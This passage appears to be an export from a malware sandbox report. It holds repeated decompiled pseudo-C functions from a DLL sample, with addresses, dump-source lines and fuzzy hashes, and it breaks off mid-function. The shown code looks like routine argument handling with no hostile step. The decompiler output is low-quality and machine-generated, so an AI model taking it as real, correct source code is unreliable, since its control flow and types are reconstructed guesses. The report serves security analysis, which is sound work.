                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80016aac;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t67 - 8));
                                                                      				goto 0x80016b7c;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80016aed;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x80016b7e;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80016b6d;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80016b29;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80016b7e;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80016b21;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x80016b24;
                                                                      				 *_t71 =  *((char*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180016a80
                                                                      0x180016a91
                                                                      0x180016a94
                                                                      0x180016a96
                                                                      0x180016a9b
                                                                      0x180016aa4
                                                                      0x180016aa7
                                                                      0x180016ab6
                                                                      0x180016ab8
                                                                      0x180016abe
                                                                      0x180016ac1
                                                                      0x180016ac6
                                                                      0x180016aca
                                                                      0x180016ad1
                                                                      0x180016ad7
                                                                      0x180016adc
                                                                      0x180016ae1
                                                                      0x180016ae8
                                                                      0x180016af8
                                                                      0x180016afa
                                                                      0x180016b04
                                                                      0x180016b09
                                                                      0x180016b11
                                                                      0x180016b13
                                                                      0x180016b19
                                                                      0x180016b1e
                                                                      0x180016b21
                                                                      0x180016b27
                                                                      0x180016b29
                                                                      0x180016b2d
                                                                      0x180016b33
                                                                      0x180016b3d
                                                                      0x180016b3f
                                                                      0x180016b43
                                                                      0x180016b46
                                                                      0x180016b4d
                                                                      0x180016b51
                                                                      0x180016b58
                                                                      0x180016b5c
                                                                      0x180016b61
                                                                      0x180016b66
                                                                      0x180016b6b
                                                                      0x180016b79
                                                                      0x180016b88

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e072e59df807cff266ccec95f147a1ac57d82057e78de7c37739342774539d90
                                                                      • Instruction ID: 2b7298ace192f40fa85b7d03f9c9ba891b6751bc322bb1f1208ce9e67544df42
                                                                      • Opcode Fuzzy Hash: e072e59df807cff266ccec95f147a1ac57d82057e78de7c37739342774539d90
                                                                      • Instruction Fuzzy Hash: 81318772618B84C5DB668F29E4913AD7BA0F78CB8CF548119DB4C4B761DF36C196CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180018B10(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018b3b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80018c08;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80018b7c;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80018c0a;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80018bfa;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80018bb6;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80018c0a;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80018bae;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80018bb1;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180018b10
                                                                      0x180018b21
                                                                      0x180018b24
                                                                      0x180018b26
                                                                      0x180018b2b
                                                                      0x180018b33
                                                                      0x180018b36
                                                                      0x180018b45
                                                                      0x180018b47
                                                                      0x180018b4d
                                                                      0x180018b50
                                                                      0x180018b55
                                                                      0x180018b59
                                                                      0x180018b60
                                                                      0x180018b66
                                                                      0x180018b6b
                                                                      0x180018b70
                                                                      0x180018b77
                                                                      0x180018b87
                                                                      0x180018b89
                                                                      0x180018b93
                                                                      0x180018b97
                                                                      0x180018b9f
                                                                      0x180018ba1
                                                                      0x180018ba7
                                                                      0x180018bab
                                                                      0x180018bae
                                                                      0x180018bb4
                                                                      0x180018bb6
                                                                      0x180018bba
                                                                      0x180018bc0
                                                                      0x180018bca
                                                                      0x180018bcc
                                                                      0x180018bd0
                                                                      0x180018bd3
                                                                      0x180018bda
                                                                      0x180018bde
                                                                      0x180018be5
                                                                      0x180018be9
                                                                      0x180018bee
                                                                      0x180018bf3
                                                                      0x180018bf8
                                                                      0x180018c05
                                                                      0x180018c14

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                      • Instruction ID: 118d82cc269797a9ce075ffaa9f12053450d77da3cdc144d3f78e4a2269516cf
                                                                      • Opcode Fuzzy Hash: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                      • Instruction Fuzzy Hash: 1131A4B2219B84C5DB658F29D49039D7BA0F78DB8CF248115EB8C0B755CF36C256D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180016B8C(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80016bb8;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t67 - 8));
                                                                      				goto 0x80016c88;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80016bf9;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x80016c8a;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80016c79;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80016c35;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80016c8a;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80016c2d;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((char*)(_t67 - 8)));
                                                                      				goto 0x80016c30;
                                                                      				 *_t71 =  *((char*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180016b8c
                                                                      0x180016b9d
                                                                      0x180016ba0
                                                                      0x180016ba2
                                                                      0x180016ba7
                                                                      0x180016bb0
                                                                      0x180016bb3
                                                                      0x180016bc2
                                                                      0x180016bc4
                                                                      0x180016bca
                                                                      0x180016bcd
                                                                      0x180016bd2
                                                                      0x180016bd6
                                                                      0x180016bdd
                                                                      0x180016be3
                                                                      0x180016be8
                                                                      0x180016bed
                                                                      0x180016bf4
                                                                      0x180016c04
                                                                      0x180016c06
                                                                      0x180016c10
                                                                      0x180016c15
                                                                      0x180016c1d
                                                                      0x180016c1f
                                                                      0x180016c25
                                                                      0x180016c2a
                                                                      0x180016c2d
                                                                      0x180016c33
                                                                      0x180016c35
                                                                      0x180016c39
                                                                      0x180016c3f
                                                                      0x180016c49
                                                                      0x180016c4b
                                                                      0x180016c4f
                                                                      0x180016c52
                                                                      0x180016c59
                                                                      0x180016c5d
                                                                      0x180016c64
                                                                      0x180016c68
                                                                      0x180016c6d
                                                                      0x180016c72
                                                                      0x180016c77
                                                                      0x180016c85
                                                                      0x180016c94

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb197f497d489a2d262cbe89ca089422f842bb9b48e775ef5c59279686d81614
                                                                      • Instruction ID: bbaeb67c4af6e06a5c919e8ff957eb26852bad2d5956d3cb543c39509ba6fbed
                                                                      • Opcode Fuzzy Hash: eb197f497d489a2d262cbe89ca089422f842bb9b48e775ef5c59279686d81614
                                                                      • Instruction Fuzzy Hash: 6C31A472604B88C5DB628F29E4403AD7BA4F39CB8CF648125EB8C4B761CF36C196CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180018C54(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018c7f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80018d4e;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80018cc0;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80018d50;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80018d40;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80018cfc;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80018d50;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80018cf4;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80018cf7;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180018c54
                                                                      0x180018c65
                                                                      0x180018c68
                                                                      0x180018c6a
                                                                      0x180018c6f
                                                                      0x180018c77
                                                                      0x180018c7a
                                                                      0x180018c89
                                                                      0x180018c8b
                                                                      0x180018c91
                                                                      0x180018c94
                                                                      0x180018c99
                                                                      0x180018c9d
                                                                      0x180018ca4
                                                                      0x180018caa
                                                                      0x180018caf
                                                                      0x180018cb4
                                                                      0x180018cbb
                                                                      0x180018ccb
                                                                      0x180018ccd
                                                                      0x180018cd7
                                                                      0x180018cdc
                                                                      0x180018ce4
                                                                      0x180018ce6
                                                                      0x180018cec
                                                                      0x180018cf1
                                                                      0x180018cf4
                                                                      0x180018cfa
                                                                      0x180018cfc
                                                                      0x180018d00
                                                                      0x180018d06
                                                                      0x180018d10
                                                                      0x180018d12
                                                                      0x180018d16
                                                                      0x180018d19
                                                                      0x180018d20
                                                                      0x180018d24
                                                                      0x180018d2b
                                                                      0x180018d2f
                                                                      0x180018d34
                                                                      0x180018d39
                                                                      0x180018d3e
                                                                      0x180018d4b
                                                                      0x180018d5a

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                      • Instruction ID: 6899eb2e137a8c4bee34c9b91f7684b63220fecc4855013917f5abbf0960c09d
                                                                      • Opcode Fuzzy Hash: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                      • Instruction Fuzzy Hash: FB31B472205B88C6EBA18F29E0403AD77A0F79CB8CF248125EB4C4B750CF36C656DB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180016CE8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long __r8, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				signed int _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t43;
                                                                      				signed int _t45;
                                                                      				intOrPtr _t58;
                                                                      				signed long long _t59;
                                                                      				intOrPtr _t62;
                                                                      				signed long long _t63;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				signed int* _t72;
                                                                      				signed int _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_t79 = __r8;
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80016d14;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				r8d =  *(_t68 - 8) & 0x000000ff;
                                                                      				 *__rdx = __r8;
                                                                      				goto 0x80016de1;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80016d55;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t58 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t58 + 0x2c)) = 0x16;
                                                                      				_t59 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t59;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t59, __rcx, _t68, __rdx, _t74, _t75, __r8);
                                                                      				goto 0x80016de3;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80016dd3;
                                                                      				_t45 =  *(_t68 + 0x34);
                                                                      				r9b =  *(_t65 + 0x39);
                                                                      				_t72 = _t65 + (_t59 + _t59 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80016d8f;
                                                                      				 *_t72 = 1;
                                                                      				_t72[1] = r9b;
                                                                      				_t72[4] = _t45;
                                                                      				dil = 1;
                                                                      				goto 0x80016de3;
                                                                      				_v24 = _t45;
                                                                      				r8d = 1;
                                                                      				if (E000000011800245A8(_t43, _t65, _t65, _t72, _t73, _t80, _t81) != 0) goto 0x80016d87;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t62 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t62 + 0x2c)) = 0x16;
                                                                      				_t63 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t63;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t63, _t65, _t65, _t72, _t74, _t75, _t79);
                                                                      				goto 0x80016d8a;
                                                                      				 *_t72 = _t63;
                                                                      				return 1;
                                                                      			}




















                                                                      0x180016ce8
                                                                      0x180016ce8
                                                                      0x180016cf9
                                                                      0x180016cfc
                                                                      0x180016cfe
                                                                      0x180016d03
                                                                      0x180016d07
                                                                      0x180016d0c
                                                                      0x180016d0f
                                                                      0x180016d1e
                                                                      0x180016d20
                                                                      0x180016d26
                                                                      0x180016d29
                                                                      0x180016d2e
                                                                      0x180016d32
                                                                      0x180016d39
                                                                      0x180016d3f
                                                                      0x180016d44
                                                                      0x180016d49
                                                                      0x180016d50
                                                                      0x180016d60
                                                                      0x180016d62
                                                                      0x180016d6c
                                                                      0x180016d70
                                                                      0x180016d78
                                                                      0x180016d7a
                                                                      0x180016d80
                                                                      0x180016d84
                                                                      0x180016d87
                                                                      0x180016d8d
                                                                      0x180016d8f
                                                                      0x180016d93
                                                                      0x180016da3
                                                                      0x180016da5
                                                                      0x180016da9
                                                                      0x180016dac
                                                                      0x180016db3
                                                                      0x180016db7
                                                                      0x180016dbe
                                                                      0x180016dc2
                                                                      0x180016dc7
                                                                      0x180016dcc
                                                                      0x180016dd1
                                                                      0x180016dde
                                                                      0x180016ded

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2726ab327665c8d6d95669bb4f8aa0f186fc6c278644ad8eba84ebd82e99fc98
                                                                      • Instruction ID: 65a4cdc2c5ea50fb4ee34f5b6cbb652ded80529b470bf5fe604a1ae9e035c7df
                                                                      • Opcode Fuzzy Hash: 2726ab327665c8d6d95669bb4f8aa0f186fc6c278644ad8eba84ebd82e99fc98
                                                                      • Instruction Fuzzy Hash: 20319A72B05B9485DB628F29E4503AD7BA0F39DB8CF258115EB8D4B761CF36C156CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180018D98(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018dc3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80018e92;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80018e04;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80018e94;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80018e84;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80018e40;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80018e94;
                                                                      				_v24 = _t43;
